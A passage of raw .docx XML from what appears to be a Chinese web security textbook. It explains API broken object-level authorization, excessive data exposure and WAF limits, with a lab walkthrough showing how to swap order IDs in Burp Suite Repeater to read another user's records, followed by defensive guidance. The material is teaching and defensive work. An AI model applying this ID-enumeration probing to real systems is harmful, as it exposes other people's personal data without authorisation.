      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1002</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1003</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，即可读取他人订单详情。这违反了“数据按用户维度隔离”的会话假设。防御上，每一次数据访问都必须基于当前会话的已认证用户身份，在服务端进行归属校验——不能依赖前端或客户端传递的任何用户标识来决定归属。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">其三，过度数据暴露与速率限制缺失。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">开发中常为前端灵活性而返回完整对象（例如在请求用户名时连带返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">email、手机号、角色等），依赖前端按需过滤显示。然而攻击者直接查看</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应即可获得远超暴露意图的敏感字段。同时，由于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通常面向自动化调用，缺乏速度与频次的门槛控制时，攻击者可低成本地进行凭据爆破、数据拖取（Scraping）或枚举。速率限制并非仅针对认证接口，对任何返回敏感资源的端点都应部署基于令牌或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的限流策略。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以下给出一个授权实验环境下，利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BOLA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">探测的教学过程。注意该示例所有环境相关值（目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP、端口、会话令牌、资源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID）均使用占位符并标记为②：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机实操单元：API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">对象级越权（BOLA）的基本探测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1128"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">目标靶机与环境</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger Web Security Academy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中标记为“Broken</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Object Level </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization”的训练场景，或自行搭建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP crAPI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶场（完全隔离于公网）。Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">已按第八章配置代理并处于拦截状态。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1128"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">逐步操作（真实语法，目标值因环境而异②）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在靶机界面以普通用户</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">userA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">登录，访问属于自己的某个资源（如订单、报告），在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP History </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中定位该请求，例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/v1/orders?id=42</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将请求发送至</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Repeater </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块。保持会话令牌（Cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Authorization </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Header）不变，将资源标识符</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的值修改为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">43</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发送请求，观察响应体。若返回了另一个用户的完整订单数据（如收件地址、订单金额），则存在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BOLA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞（②：实际响应依赖于靶机侧是否存在该记录以及防护逻辑）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1130"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：响应码可能为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">200，响应体显示非</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">userA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">所有的数据。若响应返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">403 Forbidden</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{"error": "Access Denied"}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，表明该点可能存在授权校验（但仍需进一步测试校验是否可绕过）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1130"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">常见排错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1131"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应体为空可能因为资源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">43</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不存在，应尝试多个连续</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">确认。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1131"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">令牌失效可尝试重新登录获取最新会话。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1131"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若靶机前端为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">GraphQL，BOLA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">探测需通过分析查询字段中的参数（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">getUser(id: XXX)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），原理相同但位置不同②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框（蓝队检测与修复）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">根本修复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：每一后端控制器在处理资源请求前，必须获取当前已认证用户主体，并检查请求操作的目标对象的所有者是否与当前用户一致。该逻辑应封装在中间件或数据访问层公共组件中，不允许在单个具体控制器中“选择性”执行。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测手段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在代码审查中检查所有含资源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">controller/route，确认是否调用了归属校验函数。动态测试可对每个带资源参数的端点使用两个不同权限的令牌交叉请求彼此资源，自动化流水线中可引入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Postman </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或自定义脚本进行越权回归测试。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">纵深增强</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：使用不可预测的资源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID（UUID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> v4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">而非自增整数）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">不能替代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">授权校验。攻击者可经由公开数据泄露、API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> list </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">接口返回等其他途径获取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">UUID，因此严格的归属校验是唯一可靠防线。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="225"/>
    <w:bookmarkStart w:id="226" w:name="waf-的作用与局限纵深非根治线"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的作用与局限：纵深非根治线</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用防火墙（WAF，Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Application </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Firewall）常被组织视为防护</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入、XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">及恶意请求的第一道防线。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">场景下，云服务商普遍提供</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF-as-a-Service </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">方案，使其部署与升级简便。但</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在纵深防御体系中的定位必须被准确界定：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">是信号过滤器与入侵指示器，不是代码补丁，更不是逻辑校验器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的工作机制基于模式匹配与签名识别。它对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">URI、头、body</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行规则匹配，对匹配恶意特征（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">联合查询的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标签）的请求予以告警或拦截。这种机制决定了其固有的局限性：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">其一，语法级防护对逻辑漏洞无效。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">BOLA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的探测请求</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/orders/1002</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在语法上与正常请求</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/orders/1001</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">完全一致——它不含任何攻击载荷，只是改变了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">路径中的自然数值。WAF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">无法区分这是授权用户的合法操作还是越权尝试，因为它不理解“订单</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的所属关系”这一业务逻辑。类似地，批量数据拖取、竞态条件导致的并发漏洞、支付逻辑中的负数金额篡改等，均不在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防护范围内。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">其二，基于正则的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">可被语法等价变形绕过（②环境相关，因具体</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">产品而异）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
